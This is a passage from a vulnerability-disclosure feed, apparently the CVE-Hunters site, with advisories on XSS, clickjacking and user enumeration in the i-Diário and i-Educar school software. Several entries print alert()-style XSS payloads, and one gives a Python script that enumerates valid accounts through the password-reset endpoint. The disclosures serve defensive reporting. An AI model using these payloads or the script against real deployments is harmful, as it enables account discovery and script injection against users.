cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9106%20.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9106%20.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 18 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9107/ https://www.cvehunters.com/p/cve-2025-9107/ <h2 id="cve-2025-9107-cross-site-scripting-xss-reflected-in-endpoint-search_autocomplete-parameter-q">CVE-2025-9107: Cross-Site Scripting (XSS) Reflected in endpoint <code>search_autocomplete</code> parameter <code>q</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9107" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9107</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>search_autocomplete</code> endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the <code>q</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>search_autocomplete</code></p> <p>Parameter: <code>q</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> "><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9107/image.png" width="861" height="1054" srcset="/p/cve-2025-9107/image_hu_8aadeff40c8f3d51.png 480w, /p/cve-2025-9107/image_hu_3012aeb2aec1845.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="81" data-flex-basis="196px" ></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p><h2 id="cve-2025-9107-cross-site-scripting-xss-reflected-in-endpoint-search_autocomplete-parameter-q">CVE-2025-9107: Cross-Site Scripting (XSS) Reflected in endpoint <code>search_autocomplete</code> parameter <code>q</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9107" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9107</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>search_autocomplete</code> endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the <code>q</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>search_autocomplete</code></p> <p>Parameter: <code>q</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> "><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9107/image.png" width="861" height="1054" srcset="/p/cve-2025-9107/image_hu_8aadeff40c8f3d51.png 480w, /p/cve-2025-9107/image_hu_3012aeb2aec1845.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="81" data-flex-basis="196px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9107.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9107.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 18 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9108/ https://www.cvehunters.com/p/cve-2025-9108/ <h2 id="cve-2025-9108-missing-x-frame-options-or-content-security-policy-headers">CVE-2025-9108: Missing <code>X-Frame-Options</code> or <code>Content-Security-Policy</code> Headers </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9108" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9108</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">The application does not implement protection mechanisms against <code>Clickjacking</code>. This allows legitimate pages to be embedded within malicious iframes, leading users to interact with invisible or disguised elements, which can result in session hijacking, unintended actions, and other attacks.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>https://x.x.x.x/login</code></p> <p style="text-align: justify;">The HTTP response from the page does not include the following headers:</br><li>X-Frame-Options</li><li>Content-Security-Policy: frame-ancestors 'none';</li></p> <p>Application HTTP Response:</p><h2 id="cve-2025-9108-missing-x-frame-options-or-content-security-policy-headers">CVE-2025-9108: Missing <code>X-Frame-Options</code> or <code>Content-Security-Policy</code> Headers </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9108" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9108</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">The application does not implement protection mechanisms against <code>Clickjacking</code>. This allows legitimate pages to be embedded within malicious iframes, leading users to interact with invisible or disguised elements, which can result in session hijacking, unintended actions, and other attacks.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>https://x.x.x.x/login</code></p> <p style="text-align: justify;">The HTTP response from the page does not include the following headers:</br><li>X-Frame-Options</li><li>Content-Security-Policy: frame-ancestors 'none';</li></p> <p>Application HTTP Response:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">HTTP/1.1 200 OK </span></span><span class="line"><span class="cl">Content-Type: text/html; charset=UTF-8 </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">Missing headers: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">X-Frame-Options </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Content-Security-Policy: frame-ancestors 'none'; </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">This absence allows the application to be embedded within <code>iframe</code> elements on third-party websites.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Performing unauthorized actions: Attackers can trick users into clicking hidden buttons or links, executing critical actions without their consent.</li> <li>Credential theft: A disguised click can lead users to enter sensitive information such as logins and passwords.</li> <li>Transferring funds or unauthorized purchases: Users can be tricked into authorizing financial transactions on banking or e-commerce websites.</li> <li>Changing account settings: Attackers can exploit clickjacking to trick victims into disabling security features or changing recovery emails.</li> <li>Installing malware: Manipulated clicks can initiate the download of malicious files without the user's knowledge.</li> <li>Privilege escalation: In administrative applications, a forced click can grant elevated access to attackers.</li> <li>Loss of trust: The impact The psychological and reputational impact on the organization can be significant, as users perceive the site as insecure.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://vuldb.com/?submit.627923" target="_blank" rel="noopener" >https://vuldb.com/?submit.627923</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/vanderlei-princival/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/vanderlei50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/vanderlei-princival/" target="_blank" rel="noopener" >Vanderlei Princival</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 18 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9109/ https://www.cvehunters.com/p/cve-2025-9109/ <h2 id="cve-2025-9109-user-enumeration-vulnerability-was-identified-in-the-forgot-password-functionality">CVE-2025-9109: User Enumeration vulnerability was identified in the <code>Forgot Password</code> functionality </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9109" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9109</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A User Enumeration vulnerability was identified in the <code>Forgot Password</code> functionality. The system responds differently depending on whether the submitted username exists, allowing an attacker to enumerate valid user accounts. This may assist in targeted brute-force attacks or social engineering campaigns.</p> <h2 id="details">Details </h2><p style="text-align: justify;">When submitting a POST request to the endpoint <code>/password/email</code>, the system returns different responses based on whether the provided login parameter corresponds to an existing user.</br></br>For example:</br><li>If the user <b>exists</b>: the response contains a message such as: "A password reset link has been sent".</li><li>If the user <b>does not exist</b>: the response contains a message like: "We couldn't find a user with that login".</li></p><h2 id="cve-2025-9109-user-enumeration-vulnerability-was-identified-in-the-forgot-password-functionality">CVE-2025-9109: User Enumeration vulnerability was identified in the <code>Forgot Password</code> functionality </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9109" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9109</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A User Enumeration vulnerability was identified in the <code>Forgot Password</code> functionality. The system responds differently depending on whether the submitted username exists, allowing an attacker to enumerate valid user accounts. This may assist in targeted brute-force attacks or social engineering campaigns.</p> <h2 id="details">Details </h2><p style="text-align: justify;">When submitting a POST request to the endpoint <code>/password/email</code>, the system returns different responses based on whether the provided login parameter corresponds to an existing user.</br></br>For example:</br><li>If the user <b>exists</b>: the response contains a message such as: "A password reset link has been sent".</li><li>If the user <b>does not exist</b>: the response contains a message like: "We couldn't find a user with that login".</li></p> <p style="text-align: justify;">This behavior allows an attacker to determine which usernames are valid by simply automating requests with different inputs. The vulnerability arises from a lack of uniform response for valid and invalid accounts during the password recovery process.</p> <h2 id="poc">PoC </h2><p style="text-align: justify;">A Python script was created to demonstrate this issue:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">requests</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">url</span> <span class="o">=</span> <span class="s2">"http://x.x.x.x/password/email"</span> </span></span><span class="line"><span class="cl"><span class="n">headers</span> <span class="o">=</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"><span class="s2">"Content-Type"</span><span class="p">:</span> <span class="s2">"application/x-www-form-urlencoded"</span><span class="p">,</span> </span></span><span class="line"><span class="cl"><span class="s2">"Origin"</span><span class="p">:</span> <span class="s2">"http://x.x.x.x"</span><span class="p">,</span> </span></span><span class="line"><span class="cl"><span class="s2">"Referer"</span><span class="p">:</span> <span class="s2">"http://x.x.x.x/password/reset"</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="n">logins</span> <span class="o">=</span> <span class="p">[</span><span class="s2">"admin"</span><span class="p">,</span> <span class="s2">"jose"</span><span class="p">,</span> <span class="s2">"maria"</span><span class="p">,</span> <span class="s2">"professor"</span><span class="p">,</span> <span class="s2">"aluno1"</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">for</span> <span class="n">login</span> <span class="ow">in</span> <span class="n">logins</span><span class="p">:</span> </span></span><span class="line"><span class="cl"><span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="p">{</span><span class="s2">"login"</span><span class="p">:</span> <span class="n">login</span><span class="p">},</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="s2">"enviado"</span> <span class="ow">in</span> <span class="n">response</span><span class="o">.</span><span class="n">text</span><span class="o">.</span><span class="n">lower</span><span class="p">():</span> </span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"[+] </span><span class="si">{</span><span class="n">login</span><span class="si">}</span><span class="s2"> -> EXISTE"</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="k">elif</span> <span class="s2">"não encontramos"</span> <span class="ow">in</span> <span class="n">response</span><span class="o">.</span><span class="n">text</span><span class="o">.</span><span class="n">lower</span><span class="p">():</span> </span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"[-] </span><span class="si">{</span><span class="n">login</span><span class="si">}</span><span class="s2"> -> NÃO EXISTE"</span><span class="p">)</span> </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">This script was able to confirm which users are registered in the system based on the system's response content.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Exposure of valid accounts: Attackers can confirm which users are registered in the system.</li> <li>Facilitates brute force attacks: Valid users can be targeted by automated password guessing attempts.</li> <li>Credential stuffing: Discovered accounts can be tested with leaked passwords from other services.</li> <li>Targeted phishing: Attackers can send socially engineered emails to confirmed users, increasing the success rate of scams.</li> <li>Loss of privacy: Simply confirming the existence of a user can expose sensitive data in certain contexts (e.g., accounts on restricted or confidential services).</li> <li>Attack escalation: User enumeration can serve as an initial step in exploiting more serious vulnerabilities, such as account takeovers.</li> <li>Reputational damage: The perception of basic security flaws can affect credibility. of the application with users and customers.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://vuldb.com/?submit.627926" target="_blank" rel="noopener" >https://vuldb.com/?submit.627926</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/vanderlei-princival/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/vanderlei50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/vanderlei-princival/" target="_blank" rel="noopener" >Vanderlei Princival</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 18 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8918/ https://www.cvehunters.com/p/cve-2025-8918/ <h2 id="cve-2025-8918-cross-site-scripting-xss-stored-endpoint-educar_instituicao_cadphp-parameter-bairro">CVE-2025-8918: Cross-Site Scripting (XSS) Stored endpoint <code>educar_instituicao_cad.php</code> parameter <code>Bairro</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8918" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8918</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>/intranet/educar_instituicao_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>Bairro</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_instituicao_cad.php</code></p><h2 id="cve-2025-8918-cross-site-scripting-xss-stored-endpoint-educar_instituicao_cadphp-parameter-bairro">CVE-2025-8918: Cross-Site Scripting (XSS) Stored endpoint <code>educar_instituicao_cad.php</code> parameter <code>Bairro</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8918" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8918</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>/intranet/educar_instituicao_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>Bairro</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_instituicao_cad.php</code></p> <p>Parameter: <code>Bairro</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>Bairro</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> "><span class="p"><</span><span class="nt">svg</span> <span class="na">onload</span><span class="o">=</span><span class="s">alert(1)</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8918/image.png" width="1121" height="480" srcset="/p/cve-2025-8918/image_hu_ca11c80f720a7acd.png 480w, /p/cve-2025-8918/image_hu_541791db714561e6.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="233" data-flex-basis="560px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8918.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8918.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/f%C3%AAmartins/" target="_blank" rel="noopener" >Fernanda Martins</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 13 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8919/ https://www.cvehunters.com/p/cve-2025-8919/ <h2 id="cve-2025-8919-multiples-cross-site-scripting-xss-stored-in-endpoint-objetivos-de-aprendizagem-e-habilidades">CVE-2025-8919: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>/objetivos-de-aprendizagem-e-habilidades</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8919" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8919</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>/objetivos-de-aprendizagem-e-habilidades</code> endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the <code>Código</code> and <code>Objetivo/Habilidade</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/objetivos-de-aprendizagem-e-habilidades</code></p><h2 id="cve-2025-8919-multiples-cross-site-scripting-xss-stored-in-endpoint-objetivos-de-aprendizagem-e-habilidades">CVE-2025-8919: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>/objetivos-de-aprendizagem-e-habilidades</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8919" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8919</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>/objetivos-de-aprendizagem-e-habilidades</code> endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the <code>Código</code> and <code>Objetivo/Habilidade</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/objetivos-de-aprendizagem-e-habilidades</code></p> <p>Parameters: <code>Código</code> and <code>Objetivo/Habilidade</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>Código</code> and <code>Objetivo/Habilidade</code> parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> "><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('XSS-PoC')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8919/image.png" width="1366" height="573" srcset="/p/cve-2025-8919/image_hu_61d6058a52e37131.png 480w, /p/cve-2025-8919/image_hu_29fd42848aa4238f.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="238" data-flex-basis="572px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-8919.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-8919.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/f%C3%AAmartins/" target="_blank" rel="noopener" >Fernanda Martins</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 13 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8920/ https://www.cvehunters.com/p/cve-2025-8920/ <h2 id="cve-2025-8920-cross-site-scripting-xss-stored-endpoint-dicionario-de-termos-bncc-parameter-planos-de-ensino">CVE-2025-8920: Cross-Site Scripting (XSS) Stored endpoint <code>/dicionario-de-termos-bncc</code> parameter <code>Planos de ensino</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8920" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8920</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>/dicionario-de-termos-bncc</code> endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the <code>Planos de ensino</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p><h2 id="cve-2025-8920-cross-site-scripting-xss-stored-endpoint-dicionario-de-termos-bncc-parameter-planos-de-ensino">CVE-2025-8920: Cross-Site Scripting (XSS) Stored endpoint <code>/dicionario-de-termos-bncc</code> parameter <code>Planos de ensino</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8920" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8920</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>/dicionario-de-termos-bncc</code> endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the <code>Planos de ensino</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/dicionario-de-termos-bncc</code></p> <p>Parameter: <code>Planos de ensino</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>Planos de ensino</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> "><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('XSS-PoC')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8920/image.png" width="1361" height="575" srcset="/p/cve-2025-8920/image_hu_b700522c20e08035.png 480w, 